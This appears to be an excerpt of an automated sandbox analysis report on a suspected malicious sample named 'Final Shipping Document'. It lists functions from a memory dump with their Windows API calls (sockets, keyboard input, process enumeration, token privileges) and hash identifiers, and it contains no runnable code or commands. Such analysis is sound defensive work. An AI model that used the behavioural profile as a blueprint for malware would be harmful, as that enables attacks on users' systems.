                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: Variant$ClearInitInitializeUninitialize
                                                            • String ID:
                                                            • API String ID: 1998397398-0
                                                            • Opcode ID: 9549218ab875c551bbdbd1cc20a9da0c0a1af0fcec47510423eaaec9b69b3981
                                                            • Instruction ID: 3dcbd650a6fb7fb3c18eb68a0f105085f8bc764f38018dd97ad255148706a65d
                                                            • Opcode Fuzzy Hash: 9549218ab875c551bbdbd1cc20a9da0c0a1af0fcec47510423eaaec9b69b3981
                                                            • Instruction Fuzzy Hash: 39A160756183109FC700EF24D895A2AB7E5FF89710F04889DF99A9B362DB34EE01CB51
                                                            Function 00C00436 Relevance: 6.2, APIs: 4, Instructions: 230COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00C3FC08,?), ref: 00C005F0
                                                            • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00C3FC08,?), ref: 00C00608
                                                            • CLSIDFromProgID.OLE32(?,?,00000000,00C3CC40,000000FF,?,00000000,00000800,00000000,?,00C3FC08,?), ref: 00C0062D
                                                            • _memcmp.LIBVCRUNTIME ref: 00C0064E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: FromProg$FreeTask_memcmp
                                                            • String ID:
                                                            • API String ID: 314563124-0
                                                            • Opcode ID: 516aebedfffae0de8e3e7a69bc0999cca36bc526bdaf91dd576eed002a78fb5c
                                                            • Instruction ID: 1aeaeb202f84206570ec4f16acc8cf9e971c845cb64d31dd6bfec30c37236a31
                                                            • Opcode Fuzzy Hash: 516aebedfffae0de8e3e7a69bc0999cca36bc526bdaf91dd576eed002a78fb5c
                                                            • Instruction Fuzzy Hash: 23810B71A00109EFCB04DF94C984EEEB7B9FF89315F214598F516AB290DB71AE46CB60
                                                            Function 00BE1391 Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: _free
                                                            • String ID:
                                                            • API String ID: 269201875-0
                                                            • Opcode ID: 2a46faaedc54a38411e7337f5b327f0724fe85bd3828ef952ca9c123914b13fd
                                                            • Instruction ID: 536a211250805b93851b478e081f52b8e4bf64879f4f4193f9b3da644ac8e43d
                                                            • Opcode Fuzzy Hash: 2a46faaedc54a38411e7337f5b327f0724fe85bd3828ef952ca9c123914b13fd
                                                            • Instruction Fuzzy Hash: 79414D35600591ABDB216BBE8C85FBE3AF5EF41330F344AEAF419D63D2E73448419A61
                                                            Function 00C36278 Relevance: 6.1, APIs: 4, Instructions: 138COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetWindowRect.USER32(015EF770,?), ref: 00C362E2
                                                            • ScreenToClient.USER32(?,?), ref: 00C36315
                                                            • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00C36382
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: Window$ClientMoveRectScreen
                                                            • String ID:
                                                            • API String ID: 3880355969-0
                                                            • Opcode ID: b4702cf378f53aa95bb79cf43a081dfd58811684d142b3a5a285a42ce76a3115
                                                            • Instruction ID: 0f0185bf2da40dc6abbc294af2f74fd07e89d7b6f8174882c7899a928b97bfac
                                                            • Opcode Fuzzy Hash: b4702cf378f53aa95bb79cf43a081dfd58811684d142b3a5a285a42ce76a3115
                                                            • Instruction Fuzzy Hash: EE514F75A10209EFCF10DF68D881AAE7BB5FF45360F148169F9659B2A0D731EE81CB50
                                                            Function 00C21AD6 Relevance: 6.1, APIs: 4, Instructions: 138networkCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • socket.WSOCK32(00000002,00000002,00000011), ref: 00C21AFD
                                                            • WSAGetLastError.WSOCK32 ref: 00C21B0B
                                                            • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00C21B8A
                                                            • WSAGetLastError.WSOCK32 ref: 00C21B94
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$socket
                                                            • String ID:
                                                            • API String ID: 1881357543-0
                                                            • Opcode ID: 413e89300a482c6dbc2e5b27f16039314d3ab90c93e92e82b59fe8b83ebb243a
                                                            • Instruction ID: 34dd0ae74a8f99892c233a5d402ef92c9f7171b543b960df5dadaabfaa34b87f
                                                            • Opcode Fuzzy Hash: 413e89300a482c6dbc2e5b27f16039314d3ab90c93e92e82b59fe8b83ebb243a
                                                            • Instruction Fuzzy Hash: B341D274640210AFE720AF24D886F3A77E5AB45718F588488F92A9F7D3D772DD418B90
                                                            Function 00BDB41F Relevance: 6.1, APIs: 4, Instructions: 133COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: cb43fc115f1efda2aa4526e2fdc32c2f6273ef7dc272ce26e137ca6d05ec1dc9
                                                            • Instruction ID: 35adf8395adfbae753172781870d14cb318d63e08712ae301621d858efa05b09
                                                            • Opcode Fuzzy Hash: cb43fc115f1efda2aa4526e2fdc32c2f6273ef7dc272ce26e137ca6d05ec1dc9
                                                            • Instruction Fuzzy Hash: B641C175A00644EFD724EF78C841FAABBE9EB88710F2145AFF551DB382E77199018B90
                                                            Function 00C156D9 Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00C15783
                                                            • GetLastError.KERNEL32(?,00000000), ref: 00C157A9
                                                            • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00C157CE
                                                            • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00C157FA
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: CreateHardLink$DeleteErrorFileLast
                                                            • String ID:
                                                            • API String ID: 3321077145-0
                                                            • Opcode ID: 59a6ac7422a2270336d9362c51ad612674a1edc29c0dae8ee7c2b536aac3cd8d
                                                            • Instruction ID: b250cff0909042054e6df5850588749d0bf2ec87618f41908877776d00bf9ab1
                                                            • Opcode Fuzzy Hash: 59a6ac7422a2270336d9362c51ad612674a1edc29c0dae8ee7c2b536aac3cd8d
                                                            • Instruction Fuzzy Hash: BD415E35654610DFCB11EF15C495A5EBBE2EF9A320F18C488E85AAB362CB31FD40DB91
                                                            Function 00BDD8C3 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • MultiByteToWideChar.KERNEL32(?,00000000,8BE85006,00BC6D71,00000000,00000000,00BC82D9,?,00BC82D9,?,00000001,00BC6D71,8BE85006,00000001,00BC82D9,00BC82D9), ref: 00BDD910
                                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00BDD999
                                                            • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00BDD9AB
                                                            • __freea.LIBCMT ref: 00BDD9B4
                                                              • Part of subcall function 00BD3820: RtlAllocateHeap.NTDLL(00000000,?,00C71444,?,00BBFDF5,?,?,00BAA976,00000010,00C71440,00BA13FC,?,00BA13C6,?,00BA1129), ref: 00BD3852
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                            • String ID:
                                                            • API String ID: 2652629310-0
                                                            • Opcode ID: 8db61c7b37ce4a3efc65817722979dab6c7b40e660ce3d0b2414e617d124f48c
                                                            • Instruction ID: f90f399dd50dc92f926e8b3551826f0670516352f292e06ccabe85aa61e65d2b
                                                            • Opcode Fuzzy Hash: 8db61c7b37ce4a3efc65817722979dab6c7b40e660ce3d0b2414e617d124f48c
                                                            • Instruction Fuzzy Hash: 5831E172A0020AABDF24DF65DC91EAEBBE5EB40310F0502A9FC44D7250EB3ADD50CB90
                                                            Function 00C352C1 Relevance: 6.1, APIs: 4, Instructions: 104windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SendMessageW.USER32(?,00001024,00000000,?), ref: 00C35352
                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00C35375
                                                            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00C35382
                                                            • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00C353A8
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: LongWindow$InvalidateMessageRectSend
                                                            • String ID:
                                                            • API String ID: 3340791633-0
                                                            • Opcode ID: 9270fd11a4480dcaec42430853869b337e780962ae3e870fe68d33c1d7bb493e
                                                            • Instruction ID: e3805db626329d3505db54a4df558407ea489a4160cb08ff5089d05a0885a2aa
                                                            • Opcode Fuzzy Hash: 9270fd11a4480dcaec42430853869b337e780962ae3e870fe68d33c1d7bb493e
                                                            • Instruction Fuzzy Hash: DF319634AB5A08EFEB749F14CC56FE977A5EB05390F584101FA21961F1C7B09E80DB51
                                                            Function 00C0AB9C Relevance: 6.1, APIs: 4, Instructions: 103keyboardwindowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetKeyboardState.USER32(?,75A8C0D0,?,00008000), ref: 00C0ABF1
                                                            • SetKeyboardState.USER32(00000080,?,00008000), ref: 00C0AC0D
                                                            • PostMessageW.USER32(00000000,00000101,00000000), ref: 00C0AC74
                                                            • SendInput.USER32(00000001,?,0000001C,75A8C0D0,?,00008000), ref: 00C0ACC6
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: KeyboardState$InputMessagePostSend
                                                            • String ID:
                                                            • API String ID: 432972143-0
                                                            • Opcode ID: 528ca6048dc14900e78d64a7bbcdfefa3f4d9abdbafb343e5dfdb57a272ff45a
                                                            • Instruction ID: 28d9d03224f40d0905ffc0acb22d2c500be22e6c4f2514e72eaf62849703ca14
                                                            • Opcode Fuzzy Hash: 528ca6048dc14900e78d64a7bbcdfefa3f4d9abdbafb343e5dfdb57a272ff45a
                                                            • Instruction Fuzzy Hash: FE310530A04718AFFF35CB65CC097FE7BA5AB89310F05431AE4A5961D1C3768B85D792
                                                            Function 00C37674 Relevance: 6.1, APIs: 4, Instructions: 102windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ClientToScreen.USER32(?,?), ref: 00C3769A
                                                            • GetWindowRect.USER32(?,?), ref: 00C37710
                                                            • PtInRect.USER32(?,?,00C38B89), ref: 00C37720
                                                            • MessageBeep.USER32(00000000), ref: 00C3778C
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: Rect$BeepClientMessageScreenWindow
                                                            • String ID:
                                                            • API String ID: 1352109105-0
                                                            • Opcode ID: cb5987ff9894e62bc578704a14dc21af3eb1284c3729f69ed5dd95898b4b7f08
                                                            • Instruction ID: 3f5ed2dc6eeb21ee92ee50e2c973ab54d037fbd76f82430fa11e0ad702b4c7f5
                                                            • Opcode Fuzzy Hash: cb5987ff9894e62bc578704a14dc21af3eb1284c3729f69ed5dd95898b4b7f08
                                                            • Instruction Fuzzy Hash: F84182B4615214EFCB22CF58C895FAD77F5FB4A314F1942A8E9259B261C730A942CF90
                                                            Function 00C316DA Relevance: 6.1, APIs: 4, Instructions: 101COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetForegroundWindow.USER32 ref: 00C316EB
                                                              • Part of subcall function 00C03A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00C03A57
                                                              • Part of subcall function 00C03A3D: GetCurrentThreadId.KERNEL32 ref: 00C03A5E
                                                              • Part of subcall function 00C03A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00C025B3), ref: 00C03A65
                                                            • GetCaretPos.USER32(?), ref: 00C316FF
                                                            • ClientToScreen.USER32(00000000,?), ref: 00C3174C
                                                            • GetForegroundWindow.USER32 ref: 00C31752
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                            • String ID:
                                                            • API String ID: 2759813231-0
                                                            • Opcode ID: 8fe41b99b2ce8f7aed3aabfd19ff32e6b42726e7e542d2fb72fc9801b2c28a07
                                                            • Instruction ID: ef2ccf1c91bd1a1bb693f3af0610933e0873e48032dae4aa165a6c4e6bf166d8
                                                            • Opcode Fuzzy Hash: 8fe41b99b2ce8f7aed3aabfd19ff32e6b42726e7e542d2fb72fc9801b2c28a07
                                                            • Instruction Fuzzy Hash: FC315071E14149AFCB00EFA9C8C1DAEBBFDEF49304B5480AAE415E7211DB319E45CBA0
                                                            Function 00C0D4DC Relevance: 6.1, APIs: 4, Instructions: 86processCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateToolhelp32Snapshot.KERNEL32 ref: 00C0D501
                                                            • Process32FirstW.KERNEL32(00000000,?), ref: 00C0D50F
                                                            • Process32NextW.KERNEL32(00000000,?), ref: 00C0D52F
                                                            • CloseHandle.KERNEL32(00000000), ref: 00C0D5DC
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                            • String ID:
                                                            • API String ID: 420147892-0
                                                            • Opcode ID: d4df14595b2016c7efce9a80acdec77f033b3b4f4257c025870718d384ff7aff
                                                            • Instruction ID: 31cf465ecb248201f34f7cb62d760e17c47b97dc56c7b52888c4d7e03f5d1813
                                                            • Opcode Fuzzy Hash: d4df14595b2016c7efce9a80acdec77f033b3b4f4257c025870718d384ff7aff
                                                            • Instruction Fuzzy Hash: AA31A2711083009FD300EF54CC81BAFBBF8EF9A394F14096DF592961A1EB719A45DBA2
                                                            Function 00C38FC9 Relevance: 6.1, APIs: 4, Instructions: 78windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00BB9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00BB9BB2
                                                            • GetCursorPos.USER32(?), ref: 00C39001
                                                            • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00BF7711,?,?,?,?,?), ref: 00C39016
                                                            • GetCursorPos.USER32(?), ref: 00C3905E
                                                            • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00BF7711,?,?,?), ref: 00C39094
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                            • String ID:
                                                            • API String ID: 2864067406-0
                                                            • Opcode ID: 671032604aef52b406a374da5eb718b3b43067c39ad9ab3ca45991fcb191253b
                                                            • Instruction ID: 9962df3fdd35bb8345cf50ff62c3762df20266b21077667121f7ba71c07ee0bb
                                                            • Opcode Fuzzy Hash: 671032604aef52b406a374da5eb718b3b43067c39ad9ab3ca45991fcb191253b
                                                            • Instruction Fuzzy Hash: 3721D135610118EFCB298F98CC98FFE3BB9EF49360F044055F91557261C7719A90EB60
                                                            Function 00C0D2C1 Relevance: 6.1, APIs: 4, Instructions: 78COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetFileAttributesW.KERNEL32(?,00C3CB68), ref: 00C0D2FB
                                                            • GetLastError.KERNEL32 ref: 00C0D30A
                                                            • CreateDirectoryW.KERNEL32(?,00000000), ref: 00C0D319
                                                            • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,00C3CB68), ref: 00C0D376
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: CreateDirectory$AttributesErrorFileLast
                                                            • String ID:
                                                            • API String ID: 2267087916-0
                                                            • Opcode ID: d2dbd6fe5765b7a881bdc36361bddb53e2c1e6670e2245760ab3368c40b71863
                                                            • Instruction ID: 43b9421a44599c5b424f930376e7fd43dff73720295812526f56aa148edbe27f
                                                            • Opcode Fuzzy Hash: d2dbd6fe5765b7a881bdc36361bddb53e2c1e6670e2245760ab3368c40b71863
                                                            • Instruction Fuzzy Hash: 0D219C705083019FC700DF68C8819AEB7F8AE5A764F104A5DF4AAD32E1DB31DA46CB93
                                                            Function 00C01571 Relevance: 6.1, APIs: 4, Instructions: 78memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00C01014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00C0102A
                                                              • Part of subcall function 00C01014: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00C01036
                                                              • Part of subcall function 00C01014: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00C01045
                                                              • Part of subcall function 00C01014: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00C0104C
                                                              • Part of subcall function 00C01014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00C01062
                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00C015BE
                                                            • _memcmp.LIBVCRUNTIME ref: 00C015E1
                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00C01617
                                                            • HeapFree.KERNEL32(00000000), ref: 00C0161E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
